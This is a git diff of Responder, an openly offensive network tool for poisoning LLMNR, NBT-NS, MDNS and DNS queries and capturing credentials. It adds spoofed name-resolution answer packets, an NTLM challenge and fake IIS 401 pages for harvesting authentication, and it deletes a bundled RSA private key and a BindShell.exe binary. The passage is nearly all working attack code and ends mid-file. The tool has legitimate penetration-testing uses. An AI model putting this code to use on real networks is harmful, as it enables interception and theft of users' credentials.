MSSQLBrowser + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 1433, MSSQL,))) + threads.append(Thread(target=serve_thread_udp_broadcast, args=(settings.Config.Bind_To, 1434, MSSQLBrowser,))) if settings.Config.FTP_On_Off: from servers.FTP import FTP - threads.append(Thread(target=serve_thread_tcp, args=('', 21, FTP,))) + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 21, FTP,))) if settings.Config.POP_On_Off: from servers.POP3 import POP3 - threads.append(Thread(target=serve_thread_tcp, args=('', 110, POP3,))) + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 110, POP3,))) if settings.Config.LDAP_On_Off: - from servers.LDAP import LDAP - threads.append(Thread(target=serve_thread_tcp, args=('', 389, LDAP,))) + from servers.LDAP import LDAP, CLDAP + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 389, LDAP,))) + threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 636, LDAP,))) + threads.append(Thread(target=serve_thread_udp, args=('', 389, CLDAP,))) + + if settings.Config.MQTT_On_Off: + from servers.MQTT import MQTT + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 1883, MQTT,))) if settings.Config.SMTP_On_Off: from servers.SMTP import ESMTP - threads.append(Thread(target=serve_thread_tcp, args=('', 25, ESMTP,))) - threads.append(Thread(target=serve_thread_tcp, args=('', 587, ESMTP,))) + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 25, ESMTP,))) + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 587, ESMTP,))) if settings.Config.IMAP_On_Off: from servers.IMAP import IMAP - threads.append(Thread(target=serve_thread_tcp, args=('', 143, IMAP,))) + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 143, IMAP,))) if settings.Config.DNS_On_Off: from servers.DNS import DNS, DNSTCP threads.append(Thread(target=serve_thread_udp, args=('', 53, DNS,))) - threads.append(Thread(target=serve_thread_tcp, args=('', 53, DNSTCP,))) + threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 53, DNSTCP,))) + + if settings.Config.SNMP_On_Off: + from servers.SNMP import SNMP + threads.append(Thread(target=serve_thread_udp, args=('', 161, SNMP,))) for thread in threads: - thread.setDaemon(True) + thread.daemon = True thread.start() - print color('[+]', 2, 1) + " Listening for events..." + if settings.Config.AnalyzeMode: + print(color('[+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1)) + if settings.Config.Quiet_Mode: + print(color('[+] Responder is in quiet mode. No NBT-NS, LLMNR, MDNS messages will print to screen.', 3, 1)) + + + if settings.Config.DHCP_On_Off: + from poisoners.DHCP import DHCP + DHCP(settings.Config.DHCP_DNS) while True: time.sleep(1) diff --git a/certs/gen-self-signed-cert.sh b/certs/gen-self-signed-cert.sh index c9b948a..725323c 100755 --- a/certs/gen-self-signed-cert.sh +++ b/certs/gen-self-signed-cert.sh @@ -1,3 +1,3 @@ #!/bin/bash -openssl genrsa -out responder.key 2048 -openssl req -new -x509 -days 3650 -key responder.key -out responder.crt -subj "/" +openssl genrsa -out certs/responder.key 2048 +openssl req -new -x509 -days 3650 -key certs/responder.key -out certs/responder.crt -subj "/" diff --git a/certs/responder.crt b/certs/responder.crt deleted file mode 100644 index 86d9172..0000000 --- a/certs/responder.crt +++ /dev/null @@ -1,18 +0,0 @@ ------BEGIN CERTIFICATE----- -MIIC0zCCAbugAwIBAgIJAOQijexo77F4MA0GCSqGSIb3DQEBBQUAMAAwHhcNMTUw -NjI5MDU1MTUyWhcNMjUwNjI2MDU1MTUyWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOC -AQ8AMIIBCgKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k -sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP -2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC -6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg -WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF -N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABo1AwTjAdBgNVHQ4EFgQU -YY2ttc/bjfXwGqPvNUSm6Swg4VYwHwYDVR0jBBgwFoAUYY2ttc/bjfXwGqPvNUSm -6Swg4VYwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOCAQEAXFN+oxRwyqU0 -YWTlixZl0NP6bWJ2W+dzmlqBxugEKYJCPxM0GD+WQDEd0Au4pnhyzt77L0sBgTF8 -koFbkdFsTyX2AHGik5orYyvQqS4jVkCMudBXNLt5iHQsSXIeaOQRtv7LYZJzh335 -4431+r5MIlcxrRA2fhpOAT2ZyKW1TFkmeAMoH7/BTzGlre9AgCcnKBvvGdzJhCyw -YlRGHrfR6HSkcoEeIV1u/fGU4RX7NO4ugD2wkOhUoGL1BS926WV02c5CugfeKUlW -HM65lZEkTb+MQnLdpnpW8GRXhXbIrLMLd2pWW60wFhf6Ub/kGJ5bCUTnXYPRcA3v -u0/CRCN/lg== ------END CERTIFICATE----- diff --git a/certs/responder.key b/certs/responder.key deleted file mode 100644 index f112a74..0000000 --- a/certs/responder.key +++ /dev/null @@ -1,27 +0,0 @@ ------BEGIN RSA PRIVATE KEY----- -MIIEowIBAAKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k -sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP -2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC -6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg -WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF -N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABAoIBABuAkDTUj0nZpFLS -1RLvqoeamlcFsQ+QzyRkxzNYEimF1rp4rXiYJuuOmtULleogm+dpQsA9klaQyEwY -kowTqG3ZO8kTFwIr9nOqiXENDX3FOGnchwwfaOz0XlNhncFm3e7MKA25T4UeI02U -YBPS75NspHb3ltsVnqhYSYyv3w/Ml/mDz+D76dRgT6seLEOTkKwZj7icBR6GNO1R -FLbffJNE6ZcXI0O892CTVUB4d3egcpSDuaAq3f/UoRB3xH7MlnEPfxE3y34wcp8i -erqm/8uVeBOnQMG9FVGXBJXbjSjnWS27sj/vGm+0rc8c925Ed1QdIM4Cvk6rMOHQ -IGkDnvECgYEA4e3B6wFtONysLhkG6Wf9lDHog35vE/Ymc695gwksK07brxPF1NRS -nNr3G918q+CE/0tBHqyl1i8SQ/f3Ejo7eLsfpAGwR9kbD9hw2ViYvEio9dAIMVTL -LzJoSDLwcPCtEOpasl0xzyXrTBzWuNYTlfvGkyd2mutynORRIZPhgHkCgYEA00Q9 -cHBkoBOIHF8XHV3pm0qfwuE13BjKSwKIrNyKssGf8sY6bFGhLSpTLjWEMN/7B+S1 -5IC0apiGjHNK6Z51kjKhEmSzCg8rXyULOalsyo2hNsMA+Lt1g72zJIDIT/+YeKAf -s85G6VgMtNLozNjx7C1eMugECJ+rrpRVpIe1kJcCgYAr+I0cQtvSDEjKc/5/YMje -ldQN+4Z82RRkwYshsKBTEXb6HRwMrwIhGxCq8LF59imMUkYrRSjFhcXFSrZgasr2 -VVz0G4wGf7+flt1nv7GCO5X+uW1OxJUC64mWO6vGH2FfgG0Ed9Tg3x1rY9V6hdes -AiOEslKIFjjpRhpwMYra6QKBgQDLFO/SY9f2oI/YZff8PMhQhL1qQb7aYeIjlL35 -HM8e4k10u+RxN06t8d+frcXyjXvrrIjErIvBY/kCjdlXFQGDlbOL0MziQI66mQtf -VGPFmbt8vpryfpCKIRJRZpInhFT2r0WKPCGiMQeV0qACOhDjrQC+ApXODF6mJOTm -kaWQ5QKBgHE0pD2GAZwqlvKCM5YmBvDpebaBNwpvoY22e2jzyuQF6cmw85eAtp35 -f92PeuiYyaXuLgL2BR4HSYSjwggxh31JJnRccIxSamATrGOiWnIttDsCB5/WibOp -MKuFj26d01imFixufclvZfJxbAvVy4H9hmyjgtycNY+Gp5/CLgDC ------END RSA PRIVATE KEY----- diff --git a/files/BindShell.exe b/files/BindShell.exe deleted file mode 100644 index b1a8e63..0000000 Binary files a/files/BindShell.exe and /dev/null differ diff --git a/fingerprint.py b/fingerprint.py deleted file mode 100644 index 6e2c29c..0000000 --- a/fingerprint.py +++ /dev/null @@ -1,62 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -import socket -import struct - -from utils import color -from packets import SMBHeader, SMBNego, SMBNegoFingerData, SMBSessionFingerData - -def OsNameClientVersion(data): - try: - length = struct.unpack('i", len(''.join(Packet)))+Packet - s.send(Buffer) - data = s.recv(2048) - - if data[8:10] == "\x72\x00": - Header = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00") - Body = SMBSessionFingerData() - Body.calculate() - - Packet = str(Header)+str(Body) - Buffer = struct.pack(">i", len(''.join(Packet)))+Packet - - s.send(Buffer) - data = s.recv(2048) - - if data[8:10] == "\x73\x16": - return OsNameClientVersion(data) - except: - print color("[!] ", 1, 1) +" Fingerprint failed" - return None diff --git a/odict.py b/odict.py index 4e7b93b..666e3b1 100644 --- a/odict.py +++ b/odict.py @@ -1,20 +1,12 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -from UserDict import DictMixin +import sys +try: + from UserDict import DictMixin +except ImportError: + from collections import UserDict + try: + from collections import MutableMapping as DictMixin + except ImportError: + from collections.abc import MutableMapping as DictMixin class OrderedDict(dict, DictMixin): @@ -30,7 +22,7 @@ class OrderedDict(dict, DictMixin): def clear(self): self.__end = end = [] end += [None, end, end] - self.__map = {} + self.__map = {} dict.clear(self) def __setitem__(self, key, value): @@ -77,20 +69,30 @@ class OrderedDict(dict, DictMixin): inst_dict = vars(self).copy() self.__map, self.__end = tmp if inst_dict: - return self.__class__, (items,), inst_dict + return (self.__class__, (items,), inst_dict) return self.__class__, (items,) def keys(self): return list(self) - setdefault = DictMixin.setdefault - update = DictMixin.update - pop = DictMixin.pop - values = DictMixin.values - items = DictMixin.items - iterkeys = DictMixin.iterkeys - itervalues = DictMixin.itervalues - iteritems = DictMixin.iteritems + if sys.version_info >= (3, 0): + setdefault = DictMixin.setdefault + update = DictMixin.update + pop = DictMixin.pop + values = DictMixin.values + items = DictMixin.items + iterkeys = DictMixin.keys + itervalues = DictMixin.values + iteritems = DictMixin.items + else: + setdefault = DictMixin.setdefault + update = DictMixin.update + pop = DictMixin.pop + values = DictMixin.values + items = DictMixin.items + iterkeys = DictMixin.iterkeys + itervalues = DictMixin.itervalues + iteritems = DictMixin.iteritems def __repr__(self): if not self: @@ -115,3 +117,8 @@ class OrderedDict(dict, DictMixin): def __ne__(self, other): return not self == other + + +if __name__ == '__main__': + d = OrderedDict([('foo',2),('bar',3),('baz',4),('zot',5),('arrgh',6)]) + assert [x for x in d] == ['foo', 'bar', 'baz', 'zot', 'arrgh'] diff --git a/packets.py b/packets.py index 9820e26..bb3134e 100644 --- a/packets.py +++ b/packets.py @@ -14,12 +14,16 @@ # # You should have received a copy of the GNU General Public License # along with this program. If not, see . + import struct import settings - +import codecs +import random +import re +from os import urandom from base64 import b64decode, b64encode from odict import OrderedDict -from utils import HTTPCurrentDate, RespondWithIPAton +from utils import HTTPCurrentDate, SMBTime, RespondWithIPAton, RespondWithIPPton, RespondWithIP, StructPython2or3, NetworkRecvBufferPython2or3, StructWithLenPython2or3 # Packet class handling all packet generation (see odict.py). class Packet(): @@ -48,22 +52,22 @@ class NBT_Ans(Packet): ("NbtName", ""), ("Type", "\x00\x20"), ("Classy", "\x00\x01"), - ("TTL", "\x00\x00\x00\xa5"), + ("TTL", "\x00\x04\x93\xe0"), #TTL: 3 days, 11 hours, 20 minutes (Default windows behavior) ("Len", "\x00\x06"), ("Flags1", "\x00\x00"), ("IP", "\x00\x00\x00\x00"), ]) def calculate(self,data): - self.fields["Tid"] = data[0:2] - self.fields["NbtName"] = data[12:46] - self.fields["IP"] = RespondWithIPAton() + self.fields["Tid"] = NetworkRecvBufferPython2or3(data[0:2]) + self.fields["NbtName"] = NetworkRecvBufferPython2or3(data[12:46]) + self.fields["IP"] = RespondWithIPAton() # DNS Answer Packet class DNS_Ans(Packet): fields = OrderedDict([ ("Tid", ""), - ("Flags", "\x80\x10"), + ("Flags", "\x85\x10"), ("Question", "\x00\x01"), ("AnswerRRS", "\x00\x01"), ("AuthorityRRS", "\x00\x00"), @@ -83,8 +87,162 @@ class DNS_Ans(Packet): def calculate(self,data): self.fields["Tid"] = data[0:2] self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1]) - self.fields["IP"] = RespondWithIPAton() - self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"])) + self.fields["IP"] = RespondWithIPAton() + self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"]) + +# DNS Answer Packet OPT +class DNS_AnsOPT(Packet): + fields = OrderedDict([ + ("Tid", ""), + ("Flags", "\x85\x10"), + ("Question", "\x00\x01"), + ("AnswerRRS", "\x00\x01"), + ("AuthorityRRS", "\x00\x00"), + ("AdditionalRRS", "\x00\x01"), + ("QuestionName", ""), + ("QuestionNameNull", "\x00"), + ("Type", "\x00\x01"), + ("Class", "\x00\x01"), + ("AnswerPointer", "\xc0\x0c"), + ("Type1", "\x00\x01"), + ("Class1", "\x00\x01"), + ("TTL", "\x00\x00\x00\x1e"), #30 secs, don't mess with their cache for too long.. + ("IPLen", "\x00\x04"), + ("IP", "\x00\x00\x00\x00"), + ("OPTName", "\x00"), + ("OPTType", "\x00\x29"), + ("OPTUDPSize", "\x10\x00"), + ("OPTRCode", "\x00"), + ("OPTEDNSVersion", "\x00"), + ("OPTLen", "\x00\x00"),# Hardcoded since it's fixed to 0 in this case. + ("OPTStr", "\x00\x00"), + ]) + + def calculate(self,data): + self.fields["Tid"] = data[0:2] + self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1]) + self.fields["IP"] = RespondWithIPAton() + self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"]) + +class DNS6_Ans(Packet): + fields = OrderedDict([ + ("Tid", ""), + ("Flags", "\x85\x10"), + ("Question", "\x00\x01"), + ("AnswerRRS", "\x00\x01"), + ("AuthorityRRS", "\x00\x00"), + ("AdditionalRRS", "\x00\x00"), + ("QuestionName", ""), + ("QuestionNameNull", "\x00"), + ("Type", "\x00\x1c"), + ("Class", "\x00\x01"), + ("AnswerPointer", "\xc0\x0c"), + ("Type1", "\x00\x1c"), + ("Class1", "\x00\x01"), + ("TTL", "\x00\x00\x00\x1e"), #30 secs, don't mess with their cache for too long.. + ("IPLen", "\x00\x04"), + ("IP", "\x00\x00\x00\x00"), + ]) + + def calculate(self,data): + self.fields["Tid"] = data[0:2] + self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1]) + self.fields["IP"] = RespondWithIPPton() + self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"]) + +class DNS6_AnsOPT(Packet): + fields = OrderedDict([ + ("Tid", ""), + ("Flags", "\x85\x10"), + ("Question", "\x00\x01"), + ("AnswerRRS", "\x00\x01"), + ("AuthorityRRS", "\x00\x00"), + ("AdditionalRRS", "\x00\x01"), + ("QuestionName", ""), + ("QuestionNameNull", "\x00"), + ("Type", "\x00\x1c"), + ("Class", "\x00\x01"), + ("AnswerPointer", "\xc0\x0c"), + ("Type1", "\x00\x1c"), + ("Class1", "\x00\x01"), + ("TTL", "\x00\x00\x00\x1e"), #30 secs, don't mess with their cache for too long.. + ("IPLen", "\x00\x04"), + ("IP", "\x00\x00\x00\x00"), + ("OPTName", "\x00"), + ("OPTType", "\x00\x29"), + ("OPTUDPSize", "\x10\x00"), + ("OPTRCode", "\x00"), + ("OPTEDNSVersion", "\x00"), + ("OPTLen", "\x00\x00"),# Hardcoded since it's fixed to 0 in this case. + ("OPTStr", "\x00\x00"), + ]) + + def calculate(self,data): + self.fields["Tid"] = data[0:2] + self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1]) + self.fields["IP"] = RespondWithIPPton() + self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"]) + +class DNS_SRV_Ans(Packet): + fields = OrderedDict([ + ("Tid", ""), + ("Flags", "\x85\x80"), + ("Question", "\x00\x01"), + ("AnswerRRS", "\x00\x01"), + ("AuthorityRRS", "\x00\x00"), + ("AdditionalRRS", "\x00\x00"), + ("QuestionName", ""), + ("QuestionNameNull", "\x00"), + ("Type", "\x00\x21"),#srv + ("Class", "\x00\x01"), + ("AnswerPointer", "\xc0\x0c"), + ("Type1", "\x00\x21"),#srv + ("Class1", "\x00\x01"), + ("TTL", "\x00\x00\x00\x1e"), #30 secs, don't mess with their cache for too long.. + ("RecordLen", ""), + ("Priority", "\x00\x00"), + ("Weight", "\x00\x64"), + ("Port", "\x00\x00"), + ("TargetLenPre", "\x0f"), # static, we provide netbios computer name 15 chars like Windows by default. + ("TargetPrefix", ""), + ("TargetLenSuff", ""), + ("TargetSuffix", ""), + ("TargetLenSuff2", ""), + ("TargetSuffix2", ""), + ("TargetNull", "\x00"), + ]) + + def calculate(self,data): + self.fields["Tid"] = data[0:2] + DNSName = ''.join(data[12:].split('\x00')[:1]) + SplitFQDN = re.split(r'\W+', DNSName) # split the ldap.tcp.blah.blah.blah.domain.tld + + #What's the question? we need it first to calc all other len. + self.fields["QuestionName"] = DNSName + + #Want to be detected that easily by xyz sensor? + self.fields["TargetPrefix"] = settings.Config.MachineName + + #two last parts of the domain are the actual Domain name.. eg: contoso.com + self.fields["TargetSuffix"] = SplitFQDN[-2] + self.fields["TargetSuffix2"] = SplitFQDN[-1] + #We calculate the len for that domain... + self.fields["TargetLenSuff2"] = StructPython2or3(">B",self.fields["TargetSuffix2"]) + self.fields["TargetLenSuff"] = StructPython2or3(">B",self.fields["TargetSuffix"]) + + # Calculate Record len. + CalcLen = self.fields["Priority"]+self.fields["Weight"]+self.fields["Port"]+self.fields["TargetLenPre"]+self.fields["TargetPrefix"]+self.fields["TargetLenSuff"]+self.fields["TargetSuffix"]+self.fields["TargetLenSuff2"]+self.fields["TargetSuffix2"]+self.fields["TargetNull"] + + #Our answer len.. + self.fields["RecordLen"] = StructPython2or3(">h",CalcLen) + + #for now we support ldap and kerberos... + if "ldap" in DNSName: + self.fields["Port"] = StructWithLenPython2or3(">h", 389) + + if "kerberos" in DNSName: + self.fields["Port"] = StructWithLenPython2or3(">h", 88) + # LLMNR Answer Packet class LLMNR_Ans(Packet): @@ -105,17 +263,46 @@ class LLMNR_Ans(Packet): ("AnswerNameNull", "\x00"), ("Type1", "\x00\x01"), ("Class1", "\x00\x01"), - ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec. + ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec (Default windows behavior) ("IPLen", "\x00\x04"), ("IP", "\x00\x00\x00\x00"), ]) def calculate(self): - self.fields["IP"] = RespondWithIPAton() - self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"])) - self.fields["AnswerNameLen"] = struct.pack(">h",len(self.fields["AnswerName"]))[1] - self.fields["QuestionNameLen"] = struct.pack(">h",len(self.fields["QuestionName"]))[1] + self.fields["IP"] = RespondWithIPAton() + self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"]) + self.fields["AnswerNameLen"] = StructPython2or3(">B",self.fields["AnswerName"]) + self.fields["QuestionNameLen"] = StructPython2or3(">B",self.fields["QuestionName"]) +class LLMNR6_Ans(Packet): + fields = OrderedDict([ + ("Tid", ""), + ("Flags", "\x80\x00"), + ("Question", "\x00\x01"), + ("AnswerRRS", "\x00\x01"), + ("AuthorityRRS", "\x00\x00"), + ("AdditionalRRS", "\x00\x00"), + ("QuestionNameLen", "\x09"), + ("QuestionName", ""), + ("QuestionNameNull", "\x00"), + ("Type", "\x00\x1c"), + ("Class", "\x00\x01"), + ("AnswerNameLen", "\x09"), + ("AnswerName", ""), + ("AnswerNameNull", "\x00"), + ("Type1", "\x00\x1c"), + ("Class1", "\x00\x01"), + ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec (Default windows behavior). + ("IPLen", "\x00\x04"), + ("IP", "\x00\x00\x00\x00"), + ]) + + def calculate(self): + self.fields["IP"] = RespondWithIPPton() + self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"]) + self.fields["AnswerNameLen"] = StructPython2or3(">B",self.fields["AnswerName"]) + self.fields["QuestionNameLen"] = StructPython2or3(">B",self.fields["QuestionName"]) + # MDNS Answer Packet class MDNS_Ans(Packet): fields = OrderedDict([ @@ -129,13 +316,39 @@ class MDNS_Ans(Packet): ("AnswerNameNull", "\x00"), ("Type", "\x00\x01"), ("Class", "\x00\x01"), - ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn. + ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn (Default windows behavior) ("IPLen", "\x00\x04"), ("IP", "\x00\x00\x00\x00"), ]) def calculate(self): - self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"])) + self.fields["IP"] = RespondWithIPAton() + self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"]) + +# MDNS6 Answer Packet +class MDNS6_Ans(Packet): + fields = OrderedDict([ + ("Tid", "\x00\x00"), + ("Flags", "\x84\x00"), + ("Question", "\x00\x00"), + ("AnswerRRS", "\x00\x01"), + ("AuthorityRRS", "\x00\x00"), + ("AdditionalRRS", "\x00\x00"), + ("AnswerName", ""), + ("AnswerNameNull", "\x00"), + ("Type", "\x00\x1c"), + ("Class", "\x00\x01"), + ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn (Default windows behavior) + ("IPLen", "\x00\x04"), + ("IP", "\x00\x00\x00\x00"), + ]) + + def calculate(self): + self.fields["IP"] = RespondWithIPPton() + self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"]) + +################### DHCP SRV ###################### + ##### HTTP Packets ##### class NTLM_Challenge(Packet): @@ -146,29 +359,29 @@ class NTLM_Challenge(Packet): ("TargetNameLen", "\x06\x00"), ("TargetNameMaxLen", "\x06\x00"), ("TargetNameOffset", "\x38\x00\x00\x00"), - ("NegoFlags", "\x05\x02\x89\xa2"), + ("NegoFlags", "\x05\x02\x81\xa2" if settings.Config.NOESS_On_Off else "\x05\x02\x89\xa2"), ("ServerChallenge", ""), ("Reserved", "\x00\x00\x00\x00\x00\x00\x00\x00"), ("TargetInfoLen", "\x7e\x00"), ("TargetInfoMaxLen", "\x7e\x00"), ("TargetInfoOffset", "\x3e\x00\x00\x00"), - ("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"), - ("TargetNameStr", "SMB"), + ("NTLMOsVersion", "\x0a\x00\x7c\x4f\x00\x00\x00\x0f"), + ("TargetNameStr", settings.Config.Domain), ("Av1", "\x02\x00"),#nbt name ("Av1Len", "\x06\x00"), - ("Av1Str", "SMB"), + ("Av1Str", settings.Config.Domain), ("Av2", "\x01\x00"),#Server name ("Av2Len", "\x14\x00"), - ("Av2Str", "SMB-TOOLKIT"), + ("Av2Str", settings.Config.MachineName), ("Av3", "\x04\x00"),#Full Domain name ("Av3Len", "\x12\x00"), - ("Av3Str", "smb.local"), + ("Av3Str", settings.Config.DomainName), ("Av4", "\x03\x00"),#Full machine domain name ("Av4Len", "\x28\x00"), - ("Av4Str", "server2003.smb.local"), + ("Av4Str", settings.Config.MachineName+'.'+settings.Config.DomainName), ("Av5", "\x05\x00"),#Domain Forest Name ("Av5Len", "\x12\x00"), - ("Av5Str", "smb.local"), + ("Av5Str", settings.Config.DomainName), ("Av6", "\x00\x00"),#AvPairs Terminator ("Av6Len", "\x00\x00"), ]) @@ -181,49 +394,91 @@ class NTLM_Challenge(Packet): self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le') self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le') self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le') - + #Now from bytes to str.. + self.fields["TargetNameStr"] = self.fields["TargetNameStr"].decode('latin-1') + self.fields["Av1Str"] = self.fields["Av1Str"].decode('latin-1') + self.fields["Av2Str"] = self.fields["Av2Str"].decode('latin-1') + self.fields["Av3Str"] = self.fields["Av3Str"].decode('latin-1') + self.fields["Av4Str"] = self.fields["Av4Str"].decode('latin-1') + self.fields["Av5Str"] = self.fields["Av5Str"].decode('latin-1') # Then calculate - CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"]) + + CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str("A"*8)+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"]) + CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"]) CalculateAvPairsLen = str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"]) # Target Name Offsets - self.fields["TargetNameOffset"] = struct.pack(" + + + +401 - Unauthorized: Access is denied due to invalid credentials. + + + + +
+
+

401 - Unauthorized: Access is denied due to invalid credentials.

+

You do not have permission to view this directory or page using the credentials that you supplied.

+
+
+ + +"""), ]) + def calculate(self): + self.fields["ActualLen"] = len(str(self.fields["Payload"])) class IIS_Auth_Granted(Packet): fields = OrderedDict([ ("Code", "HTTP/1.1 200 OK\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), ("Type", "Content-Type: text/html\r\n"), ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"), ("ContentLen", "Content-Length: "), ("ActualLen", "76"), ("CRLF", "\r\n\r\n"), - ("Payload", "\n\n\n\nLoading\n\n\n"), + ("Payload", ""), ]) def calculate(self): self.fields["ActualLen"] = len(str(self.fields["Payload"])) @@ -231,12 +486,34 @@ class IIS_Auth_Granted(Packet): class IIS_NTLM_Challenge_Ans(Packet): fields = OrderedDict([ ("Code", "HTTP/1.1 401 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), ("Type", "Content-Type: text/html\r\n"), ("WWWAuth", "WWW-Authenticate: NTLM "), ("Payload", ""), ("Payload-CRLF", "\r\n"), + ("ContentLen", "Content-Length: "), + ("ActualLen", "76"), + ("CRLF", "\r\n\r\n"), + ("Payload2", """ +Not Authorized + +

Not Authorized

+

HTTP Error 401. The requested resource requires user authentication.

